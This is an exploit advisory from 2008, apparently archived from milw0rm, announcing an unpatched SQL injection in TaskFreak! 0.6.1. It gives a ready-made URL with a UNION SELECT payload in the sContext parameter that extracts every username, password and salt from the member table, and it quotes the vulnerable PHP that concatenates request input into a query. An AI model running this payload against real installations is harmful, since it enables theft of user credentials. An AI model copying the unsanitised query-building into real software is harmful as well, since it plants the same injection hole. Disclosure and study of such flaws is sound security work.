TaskFreak! 0.6.1 - SQL Injection
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########### TheDefaced.org ###########
########### TheDefaced Security Team Presents An 0-day. ###########
########### TaskFreak! SQL Injection ###########
# Product: #
# TaskFreak!/Discovered in <==0.6.1 #
# #
# Vuln: #
# Remote SQL Injection #
# #
# Description: #
# The request is not sanitized before it is concatenated to the query. #
# #
# Patch: #
# No Patch #
# #
# Other: #
# #
# You must have a login to the script for this to work, #
# #
# magic_quotes_gpc must be set to Off in the php configuration #
# #
# URL Form: #
# Be sure to change " prefix " sUser " & " sContext " Accordingly! #
# #
# index.php?sProject=0&id=&mode=save&sort=deadlineDate&dir=1&show=today&sUser=1 #
# &sContext=1'+GROUP+BY+1+union+all+select+1,2,3,4,5, #
# concat(username,char(58),password,char(58),salt) #
# ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+prefix_member/* #
# #
# #
# The following URL will pull and display all usernames passwords and salts from the...#
# prefix_member column #
# #
# The following code in the script is vulnerable... #
# #
# [PHP] #
# #
# if ($_REQUEST['sContext']) { #
# $pContext = $_REQUEST['sContext']; #
# $objItemList->addWhere('context = \''.$pContext.'\''); #
# $pLink=Tzn::concatUrl($pLink,'sContext='.$pContext); #
# } #
# [/PHP] #
# #
# #
# #
# #
# Contact Us #
# WebSite: http://www.thedefaced.org #
# milw0rm.com [2008-01-12]